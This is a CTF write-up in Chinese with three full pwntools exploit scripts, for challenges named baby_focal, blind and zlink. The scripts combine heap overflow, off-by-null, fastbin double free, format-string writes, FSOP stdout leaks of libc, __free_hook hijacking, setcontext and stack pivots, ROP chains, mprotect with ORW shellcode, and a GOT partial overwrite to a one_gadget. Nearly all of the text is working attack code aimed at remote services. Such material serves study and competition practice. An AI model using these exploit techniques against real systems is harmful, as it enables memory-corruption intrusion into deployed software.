mt-ctf

baby_focal

堆溢出,沒開 PIE,沒有 show 功能:先劫持 stdout 的 _IO_write_base 泄露 libc 地址,再劫持存放堆塊指針的數(shù)組得到任意地址寫原語(yǔ)。題目開了沙盒,只能走 open/read/write;libc 版本是 2.31,因此把 __free_hook 改成一個(gè)能控制 rbp 的 gadget,配合程序里的 leave;ret 把棧遷移到 bss 上的 ROW 鏈上(作者注:走 TLS 的做法遠(yuǎn)程沒走通,原因不明)。
爆破 1/16:用 fd 低 2 字節(jié)(腳本里寫死 0x265d)去猜 stdout 的地址,其中 4 位是 ASLR 隨機(jī)的;腳本本身沒有重試循環(huán),需要手動(dòng)反復(fù)運(yùn)行直到猜中。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
# Dump every byte on the wire; handy when a run dies on a bad 1/16 guess.
context.log_level = 'debug'

binary = 'baby_focal'
elf = ELF(binary)
# NOTE(review): elf.libc is the *local* loader's libc. The libc.sym lookups
# further down are only valid against the remote if this matches the
# challenge libc (2.31 per the writeup); otherwise point ELF() at the
# provided libc.so.6 instead.
libc = elf.libc
context.binary = binary

# 0 -> talk to the CTF service, 1 -> spawn the binary locally.
DEBUG = 0
if DEBUG:
    p = process(binary)
    # qemu-user variants kept for reference (not used on this x86_64 target):
    #   p = process(["qemu-aarch64", "-L", "", binary])
    #   p = process(["qemu-aarch64", "-L", "", "-g", "1234", binary])
else:
    host = "115.28.187.226"
    port = 32435
    p = remote(host, port)


# I/O shorthands. This script is Python 2 pwntools, where str() on a payload
# is a no-op; under Python 3 the same str() calls would mangle bytes payloads.
def l64():
    """Grab the next userland pointer (6 bytes ending in 0x7f) as a qword."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """32-bit sibling of l64: libc pointers on i386 end in 0xf7."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """sendline b once prompt a has been received."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """send b (no trailing newline) once prompt a has been received."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log `name: 0x...` at success level."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    return p.send(payload)


def rl():
    return p.recv()


def sl(payload):
    return p.sendline(payload)


def ru(a):
    return p.recvuntil(str(a))


# The binary asks for a name first; any value will do.
sla("name: ", "aaaa")
def cmd(idx):
    """Pick menu entry `idx` at the `>> ` prompt (sla() stringifies it)."""
    sla(">> ", idx)
def add(idx, size):
    """Menu 1: malloc a `size`-byte chunk and store it in slot `idx`."""
    cmd(1)
    for prompt, answer in (("index >> ", idx), ("size >> ", size)):
        sla(prompt, answer)
def free(idx):
    """Menu 3: free the chunk held in slot `idx`."""
    cmd(3)
    sla("index >> ", idx)
def edit(idx, payload):
    """Menu 2: write `payload` into slot `idx`.

    The payload is sent raw (no newline appended); callers in this script
    add the trailing newline themselves.
    """
    cmd(2)
    sla("index >> ", idx)
    sa("content >> ", payload)
# ---------------------------------------------------------------------------
# Stage 1: heap grooming. glibc 2.31 (tcache present); the binary is non-PIE,
# so the 0x4040xx constants below are fixed .bss addresses.
# ---------------------------------------------------------------------------
# Fill the 0x70 tcache bin (7 entries) so later 0x70-sized frees fall through
# to the fastbin, which is where the fd poisoning below is done.
for i in range(7):
    add(0,0x68)
    free(0)
add(1,0x4f0)
add(2,0x18)
add(3,0x68)
# 0x500 is above tcache range, so free(1) parks it in the unsorted bin; the
# 0x430 request is carved from it and the next two adds presumably come from
# the remainder (layout inferred from the sizes - verify in gdb).
free(1)
add(1,0x430)
add(4,0x68)
add(0,0x18)
free(4)
free(3)
# Heap overflow out of a 0x18 slot: the 0x18 bytes of filler reach the next
# chunk's size field (forced to 0x71) and the bytes after it land on that
# chunk's fd. Only low bytes are written, so no heap address is needed.
edit(2,"a"*0x18+p64(0x71)+p8(0xa0)+'\n')
# fd low 16 bits -> 0x265d: the guessed offset of a fake 0x7f-sized chunk at
# _IO_2_1_stdout_-0x43. Bits 12-15 are ASLR, hence the 1/16 success rate.
# There is no retry loop; rerun the script until the guess hits.
edit(0,"a"*0x18+p64(0x71)+p16(0x265d)+'\n')
add(3,0x68)
free(1)
add(4,0x60)
# gdb.attach(p)
# Walk the poisoned bin until malloc returns the chunk overlapping stdout.
add(1,0x61)
# Classic stdout leak: with the fake chunk at stdout-0x43, 0x33 bytes of
# filler put the p64 on _flags. 0xfbad1887 is the usual leak value, the three
# _IO_read_* pointers are zeroed and the low byte of _IO_write_base is
# cleared, so the next flush prints libc memory that precedes the buffer.
edit(1,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0)+'\n')
# The first 0x7f-terminated qword that comes back is &_IO_2_1_stdin_.
# NOTE: libc.sym comes from the local elf.libc set up above - it must match
# the remote build for this subtraction to be right.
libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
lg("libc_base",libc_base)
# ---------------------------------------------------------------------------
# Stage 2: turn the overflow into an arbitrary write by pointing a freed
# chunk's fd at the program's chunk-pointer table in .bss.
# ---------------------------------------------------------------------------
# Presumably re-creates plausible chunk headers (0x21, 0x71) inside slot 4 so
# the allocator's size checks keep passing after the overlaps above.
payload = "\x00"*0x28+p64(0x21)
payload = payload.ljust(0x48,"\x00")
payload += p64(0x71)
edit(4,payload+'\n')
edit(0,"a"*0x18+p64(0xc1)+'\n')
free(3)
payload = "\x00"*0x28+p64(0x21)
payload = payload.ljust(0x48,"\x00")
payload += p64(0x71)
# fd of the freed 0x70 chunk -> 0x404070, inside the .bss pointer table.
payload += p64(0x404070)
free(0)
edit(4,payload+'\n')
add(3,0x60)
# This second allocation comes back as 0x404070 (the poisoned fd).
add(0,0x60)
# Seed the table so that a later edit() can rewrite the table itself.
# (Slot layout inferred from the (pointer, size) pairs written further
# down - confirm against the binary.)
payload = p64(0x404060)+p64(0x1000)
edit(0,payload+'\n')
# ---------------------------------------------------------------------------
# Stage 3: gadgets. Every raw offset here is tied to the exact remote glibc
# 2.31 build; recompute them (ROPgadget / one_gadget) for any other libc.
# ---------------------------------------------------------------------------
# Unexplained libc offset (TLS area? the writeup mentions a TLS attempt that
# did not work remotely); only used as addr-0x58 below.
addr = 0x1f3580+libc_base
# __free_hook target: per the writeup, a gadget that lets rdi control rbp.
gaget = 0x0000000000157d8a+libc_base
setcontext = libc_base+libc.sym["setcontext"]+61
# Must be `syscall; ret` - the chain continues after each use.
syscall = 0x0000000000066229+libc_base
free_hook1 = libc_base+libc.sym["__free_hook"]
# Page containing __free_hook; scratch buffer for the ORW chain's read/write.
free_hook1 = free_hook1 & 0xfffffffffffff000
pop_rdi = libc_base+0x0000000000026b72
pop_rsi = libc_base+0x0000000000027529
# Pops rdx plus one more register, hence the doubled values in the chain.
pop2_rdx = libc_base+0x000000000011c371
pop_rax = libc_base+0x000000000004a550
# Leftover SROP frame from an abandoned setcontext route: built but never
# sent (only a commented-out edit() at the bottom references it).
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
frame = str(frame)
# Rewrite the pointer table as (pointer, size) pairs. From the edits that
# follow: slot 1 -> 0x4040b0 (the fake stack), slot 2 -> __free_hook.
# `setcontext<<0x11` is far outside the canonical address range and looks
# like another leftover; confirm that entry is never dereferenced.
payload = p64(addr-0x58)+p64(0x1000)
payload += p64(0x4040b0)+p64(0x1000)
payload += p64(libc_base+libc.sym["__free_hook"])+p64(0x1000)
payload += p64(setcontext<<0x11)+p64(0)+p64(0)+p64(0x4040b0)
edit(2,payload +'\n')
# `leave; ret` in the binary itself - the stack pivot.
leaver = 0x0000000000401419
# Unused.
pop_rbp = 0x0000000000032b58+libc_base
# ORW chain (sandboxed, so no execve): open("/flag", O_RDONLY) via rax=2,
# then read(3, buf, 0x200) and write(1, buf, 0x100). fd 3 is assumed to be
# the first free descriptor.
payload2 = [
    pop_rdi,
    0x404100,
    pop_rsi,
    0,
    pop2_rdx,
    0,
    0,
    pop_rax,
    2,
    syscall,
    pop_rdi,
    3,
    pop_rsi,
    free_hook1+0x200,
    pop2_rdx,
    0x200,
    0x200,
    pop_rax,
    0,
    syscall,
    pop_rdi,
    1,
    pop_rsi,
    free_hook1+0x200,
    pop2_rdx,
    0x100,
    0x100,
    pop_rax,
    1,
    syscall

]
# Fake stack at 0x4040b0: the leave;ret hops move rsp onto the chain, and
# "/flag" sits at 0x4040b0+0x50 == 0x404100, the rdi used by the open above.
payload = p64(0x4040b0+0x50)+p64(leaver)+p64(0x4040b0+0x50)+p64(0x4040b0-0x8)
payload += p64(leaver)
payload = payload.ljust(0x48,"a")
payload += p64(0x4040b0)
payload += "/flag\x00\x00\x00"
edit(1,payload+flat(payload2)+'\n')
# __free_hook = rbp-control gadget; free(1) then calls it with rdi = 0x4040b0.
edit(2,p64(gaget)+'\n')
free(1)
p.interactive()
# edit(1,frame+'\n')
# edit(1,"%11$p-%12$p-%13$p"+'\n')
# ru("0x")
# ru("0x")
# canary = int(ru("-")[:-1],16)
# lg("canary",canary)
# gdb.attach(p)
# payload = p64(0x404090)*2
# payload += '\x00'*0x70+p64(canary)+p64(0)
# edit(0,payload+'\n')
# # sc = shellcraft.open("flag")
# # sc += shellcraft.read("rax",free_hook1+0x200,0x100)
# # sc += shellcraft.write(1,free_hook1+0x200,0x100)
# # p.recv()
# # p.send("4")
# # sleep(0.01)
# # p.sendline(flat(payload).ljust(0x100,"a")+"/flag\x00\x00\x00")
blind

格式化字符串加棧溢出,跟進(jìn)exit函數(shù)發(fā)現(xiàn)在dl_fini有一處函數(shù)調(diào)用


`call qword ptr [r12+rdx*8]`,其中 rdx 為 0;r12 先由 rax 賦值,再通過(guò) `add r12, qword ptr [rbx]` 加上一個(gè)值,而 [rbx] 就在棧上。因此可以用格式化字符串改寫 [rbx]:r12 被 rax 賦值后指向 bss,只要把 [rbx] 控制成合適的差值,這條 call 就會(huì)直接調(diào)到后門函數(shù)。另一條路是棧溢出之后直接 ROP:先調(diào) read 往 read 的 GOT 表項(xiàng)里寫,把它改成 one_gadget 即可 getshell;因?yàn)橹桓牡?2 字節(jié),其中 4 位是隨機(jī)的,所以要爆破 1/16(腳本里沒有重試循環(huán),需手動(dòng)多跑)。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
# Dump every byte on the wire while brute-forcing the 1/16 guess.
context.log_level = 'debug'

binary = 'blind'
elf = ELF(binary)
# NOTE(review): elf.libc is the *local* libc; only elf.got/elf.plt of the
# challenge binary are used below, so this matters less here than usual.
libc = elf.libc
context.binary = binary

# As published DEBUG is 1: this runs the local binary. Set 0 for the service.
DEBUG = 1
if DEBUG:
    p = process(binary)
    # qemu-user variants kept for reference (not used on this x86_64 target):
    #   p = process(["qemu-aarch64", "-L", "", binary])
    #   p = process(["qemu-aarch64", "-L", "", "-g", "1234", binary])
else:
    host = "115.28.187.226"
    port = 12435
    p = remote(host, port)


# I/O shorthands. This script is Python 2 pwntools, where str() on a payload
# is a no-op; under Python 3 the same str() calls would mangle bytes payloads.
def l64():
    """Grab the next userland pointer (6 bytes ending in 0x7f) as a qword."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """32-bit sibling of l64: libc pointers on i386 end in 0xf7."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """sendline b once prompt a has been received."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """send b (no trailing newline) once prompt a has been received."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log `name: 0x...` at success level."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    return p.send(payload)


def rl():
    return p.recv()


def sl(payload):
    return p.sendline(payload)


def ru(a):
    return p.recvuntil(str(a))
# Stage 1: format-string write. "%696c" emits 696 (= 0x2b8) bytes and "%26$hn"
# stores that 16-bit count through the pointer found in positional argument
# 26. The 0x400913 qword (non-PIE .text; the backdoor per the writeup) rides
# along in the same 0x18-byte buffer. The writeup's target is the
# `call [r12+rdx*8]` in _dl_fini whose [rbx] operand lives on the stack; how
# the 0x2b8 count and this qword combine to steer it is not recoverable from
# the script alone - confirm in gdb before reusing.
payload = "%696c%26$hn\x00".ljust(0x10,"\x00")
payload += p64(0x400913)
# payload = p64(0x400913)
p.recv()
# gdb.attach(p,"b *(0x7ffff7de7df9)")
p.send(payload)
# Unused.
leaver = 0x00000000004008ad 
# Gadgets in the binary (non-PIE). 0x400a41 is presumably the
# `pop rsi; pop r15; ret` tail of __libc_csu_init, which is why the GOT
# address is supplied twice below (second copy feeds r15).
poprdi = 0x0000000000400a43
poprsi = 0x0000000000400a41
# No prompt to sync on, so consecutive sends are separated by sleeps. This
# is timing-dependent and brittle over a slow link; prefer recvuntil on real
# program output where the binary prints any.
sleep(0.01)
# Stage 2: stack overflow -> ROP. read(0, read@got, <rdx left as-is>) and
# then call read@plt a second time, which jumps wherever the GOT now points.
payload = "a"*0x38+p64(poprdi)+p64(0)+p64(poprsi)+p64(elf.got["read"])*2+p64(elf.plt["read"])*2
p.send(payload)
sleep(0.1)
# attach(p)
# Partial overwrite of read@got: the low 12 bits of a libc address are fixed
# (page offset), so a 2-byte write guesses 4 ASLR bits -> 1/16 per run.
# 0x5247 is the low half of the chosen one_gadget in the remote libc; there
# is no retry loop, rerun on failure.
p.send(p16(0x5247))
# p.shutdown("in")
p.interactive()
zlink

off-by-null。由于全局變量的限制,本題相當(dāng)于沒有 show;遠(yuǎn)程 libc 版本是 2.23,因此先劫持 stdout 的 _IO_write_base 泄露 libc 地址。又因?yàn)?edit 的時(shí)候會(huì)向 __free_hook-0x18 處寫入 0x7f,正好可以充當(dāng) fastbin 塊的 size,于是用 fastbin double free 拿到 __free_hook-0x18 處的塊,把 __free_hook 改成 setcontext+53,再借 setcontext 做 read + mprotect 跳到 shellcode,ORW 一把梭。
爆破 1/16:fastbin fd 的低 2 字節(jié)寫成 0x25dd 去猜 stdout 的地址,其中 4 位是 ASLR 隨機(jī)的;腳本沒有重試循環(huán),需要手動(dòng)多跑幾次直到猜中。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
# Dump every byte on the wire while brute-forcing the 1/16 guess.
context.log_level = 'debug'

binary = 'zlink'
elf = ELF(binary)
# NOTE(review): elf.libc is the *local* loader's libc. The libc.sym lookups
# (setcontext, __free_hook, _IO_2_1_stdin_) further down are only valid
# against the remote if this matches the challenge libc (2.23 per the
# writeup); otherwise point ELF() at the provided libc.so.6 instead.
libc = elf.libc
context.binary = binary

# 0 -> talk to the CTF service, 1 -> spawn the binary locally.
DEBUG = 0
if DEBUG:
    p = process(binary)
    # qemu-user variants kept for reference (not used on this x86_64 target):
    #   p = process(["qemu-aarch64", "-L", "", binary])
    #   p = process(["qemu-aarch64", "-L", "", "-g", "1234", binary])
else:
    host = "115.28.187.226"
    port = 22435
    p = remote(host, port)


# I/O shorthands. This script is Python 2 pwntools (see the print statement
# further down), where str() on a payload is a no-op; under Python 3 the same
# str() calls would mangle bytes payloads.
def l64():
    """Grab the next userland pointer (6 bytes ending in 0x7f) as a qword."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """32-bit sibling of l64: libc pointers on i386 end in 0xf7."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """sendline b once prompt a has been received."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """send b (no trailing newline) once prompt a has been received."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log `name: 0x...` at success level."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    return p.send(payload)


def rl():
    return p.recv()


def sl(payload):
    return p.sendline(payload)


def ru(a):
    return p.recvuntil(str(a))
def cmd(idx):
    """Answer the menu prompt (synced on the next ':') with choice `idx`."""
    sla(":", idx)
def add(size, payload, idx):
    """Menu 1: allocate `size` bytes into slot `idx` and fill it with `payload`.

    The content is sent raw (no newline) so binary payloads are not altered.
    """
    cmd(1)
    for prompt, answer in (("Index:", idx), ("Heap : ", size)):
        sla(prompt, answer)
    sa("tent?:", payload)
def free(idx):
    """Menu 2: free slot `idx` (the double frees below rely on the slot
    staying usable afterwards)."""
    cmd(2)
    sla("Index:", idx)
def show(idx):
    """Menu 5: print slot `idx`.

    Not used on the live path (only in a commented-out line at the bottom).
    The prompt is spelled "Index :" here, unlike the other helpers - verify
    against the binary before relying on it.
    """
    cmd(5)
    sla("Index :", idx)
def edit(idx, payload):
    """Menu 6: overwrite slot `idx` with `payload`, sent raw (no newline)."""
    cmd(6)
    sla("Index:", idx)
    sa("tent?:", payload)
def add2():
    """Menu 4 (takes no arguments). The main flow calls cmd(4) directly."""
    cmd(4)
# ---------------------------------------------------------------------------
# Stage 1: off-by-null -> overlapping chunks. glibc 2.23: no tcache, fastbins
# up to 0x80, and backward consolidation on free. Slots 14/15 appear to be
# chunks the program itself creates through menu 4 (inferred from the frees
# that follow - confirm).
# ---------------------------------------------------------------------------
cmd(4)
add(0x60,"aaa",0)
free(15)
add(0x60,'aaaa',1)
free(14)
add(0x20,"aaa",2)
add(0x60,"aaa",3)
add(0x60,"aaa",4)
add(0x60,"aaa",5)
add(0x70,"aaa",6)
add(0x70,"aaa",7)
add(0x70,"aaa",8)
add(0x70,"aaa",9)
add(0x70,"aaa",10)
add(0x30,"aaa",11)
cmd(4)
free(11)
# 0x38 request: 0x30 filler + a fake prev_size of 0x470 fill the chunk
# exactly, and the off-by-null then clears PREV_INUSE on the following
# chunk. Freeing that neighbour consolidates backwards over 0x470 bytes of
# still-live chunks.
add(0x38,"a",11)
edit(11,"a"*0x30+p64(0x470))
free(14)
# Park slots 6-10 (0x80 fastbin) so the allocations below are carved from
# the consolidated region and overlap their fd fields.
free(6)
free(7) 
free(8)
free(9)
free(10)
add(0x50,"aaa",6)
# Each of these overlaps a freed 0x70 fastbin chunk (slots 1/4/5 per the
# author's trailing comments) and rewrites the low 16 bits of its fd to
# 0x25dd: the guessed offset of a fake 0x7f chunk at _IO_2_1_stdout_-0x43.
# Bits 12-15 are ASLR -> 1/16 success; no retry loop, rerun until it hits.
add(0x60,p16(0x25dd),7)#1
add(0x60,p16(0x25dd),8)#4
add(0x60,p16(0x25dd),9)#5
"""
0x5555557560a0: 0x0000555555757620  0x0000555555757110
0x5555557560b0: 0x0000555555757010  0x0000555555757040
0x5555557560c0: 0x0000555555757180  0x00005555557571f0
0x5555557560d0: 0x00005555557570b0  0x0000555555757110
0x5555557560e0: 0x0000555555757180  0x00005555557571f0
"""
free(1)
free(4)
free(7)
# Second round: the re-freed chunks' fds get their low byte set to 0xe0
# (page offset only - the heap base itself is still unknown).
add(0x60,p8(0xe0),1)
add(0x60,p8(0xe0),4)
add(0x60,p8(0xe0),7)
free(6)
# stdout leak, performed through two overlapping slots: 0x33 filler reaches
# _flags (fake chunk at stdout-0x43), 0xfbad1887 is the usual leak value,
# the _IO_read_* pointers are zeroed and the low byte of _IO_write_base is
# lowered (0x00, then 0x88) so the next flush dumps libc memory that
# precedes stdout's buffer.
add(0x60,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0),6)
free(2)
add(0x60,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88),2)
# First 0x7f-terminated qword returned is &_IO_2_1_stdin_. libc.sym is the
# local elf.libc from the setup; it has to match the remote 2.23 build.
libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
lg("libc_base",libc_base)
# ---------------------------------------------------------------------------
# Stage 2: fastbin double free -> chunk at __free_hook-0x18. Per the writeup
# edit() already leaves a 0x7f byte there, which is all the fastbin size
# check looks at.
# ---------------------------------------------------------------------------
free(1)
free(0)
free(7)
addr = libc_base+libc.sym["setcontext"]
add(0x60,p64(libc_base+libc.sym["__free_hook"]-0x18),1)
add(0x60,p64(libc_base+libc.sym["__free_hook"]-0x18),0)
# Unused.
free_hook = libc.symbols["__free_hook"]+libc_base
# `+` binds tighter than `&`, so this is (__free_hook + base) & ~0xfff: the
# page holding __free_hook, reused below as stack, ROP buffer and shellcode
# area after mprotect.
free_hook1 = libc.sym["__free_hook"]+libc_base&0xfffffffffffff000
# Raw offsets for the remote glibc 2.23 build; recompute for any other libc.
pop_rdi = 0x0000000000021112 + libc_base
pop_rsi = libc_base + 0x00000000000202f8
pop_rdx = libc_base + 0x0000000000001b92
pop_rax = libc_base + 0x000000000003a738
syscall = libc_base + 0x00000000000bc3f5
# Register file consumed by setcontext+53 (rdi = this frame): rsp -> the
# free_hook page, rip -> a syscall gadget. This relies on setcontext leaving
# rax = 0 (SYS_read) - a glibc detail, confirm for the target build - so it
# becomes read(0, free_hook1, 0x2000) followed by a ret into free_hook1.
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
frame = str(frame)
# Python 2 print statement: this script does not run under Python 3.
print len(frame)
# The frame is longer than a 0x60 chunk, so it is laid out across two
# overlapping chunks (bytes 0x60-0x70 fall on the second chunk's header).
add(0x60,frame[:0x60],7)
free(4)
add(0x60,frame[0x70:0xd0],4)
free(7)
# Slot 13 holds the frame (free(13) passes its address as rdi to the hook);
# slot 12 is the __free_hook-0x18 chunk, where three copies of setcontext+53
# guarantee one lands exactly on __free_hook.
add(0x68,frame[:0x60],13)
add(0x60,p64(addr+53)*3,12)
free(13)
# Consumed by the read() set up above: mprotect(free_hook1, 0x2000, 7)
# (rax = 10), then return into the shellcode at free_hook1+0x70.
payload = [
    pop_rdi,
    free_hook1,
    pop_rsi,
    0x2000,
    pop_rdx,
    0x7,
    pop_rax,
    10,
    syscall,
    free_hook1+0x70
]
# ORW shellcode: open("/flag") -> read(fd from rax, buf, 0x100) -> write(1,
# buf, 0x100). Output is capped at 0x100 bytes.
sc = shellcraft.open("/flag")
sc += shellcraft.read("rax",free_hook1+0x200,0x100)
sc += shellcraft.write("1",free_hook1+0x200,0x100)
p.sendline(flat(payload).ljust(0x70,'\x90')+asm(sc))
# gdb.attach(p)
# edit(5,p8(0x00))
p.interactive()
# show(1)
# libc_base = l64()-libc.sym["__malloc_hook"]-0x10-88-0x400
# lg("libc_base",libc_base)